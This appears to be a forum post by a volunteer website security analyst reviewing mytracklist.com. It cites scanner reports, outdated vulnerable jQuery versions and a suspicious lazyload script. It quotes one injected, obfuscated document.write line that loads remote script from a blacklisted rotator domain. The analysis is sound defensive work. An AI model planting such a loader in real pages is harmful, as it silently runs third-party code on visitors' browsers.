See: http://killmalware.com/mytracklist.com/#
Re: https://urlquery.net/report.php?id=1448202209225 various instances of malware flagged…
Missed: https://www.virustotal.com/nl/url/a8888c6e9f3f84a13502759a3ff49220d03537ed7bac2733b473c65847ec8433/analysis/1448202188/
Potentially suspicious given at Quttera’s /js/jquery.lazyload-ad-1.4.2-min.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method document.write __tmpvar90537003 = document.write;
Read: http://www.fileswrong.com/zwqo-jquery.lazyload-ad-1.4.2-min[1].js-has-something-wrong-in-it.htm
versus: http://www.exedb.com/nl/jquery.lazyload-ad-1.4.2-min[1].js/623962
-http://mytracklist.com/
Detected libraries:
jquery - 1.7 : -http://mytracklist.com/js/jquery-1.7.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.2.6 : -http://mytracklist.com/js/jquery.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
2 vulnerable libraries detected
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
document.write(‘<scr’+‘ipt type=“text/javascript” src="-http://rotator.luxup.ru/top/39/?t='+((new Date()).getTime()%10000000)*100+Math.round(Math.random()*99)+’"><‘+’/scr’+‘ipt>’);
This site is being blocked by DrWeb as advertising link - to opened only in icognito mode!
Re: http://searchdns.netcraft.com/?host=*.luxup.ru
polonus (volunteer website security analyst and website error-hunter)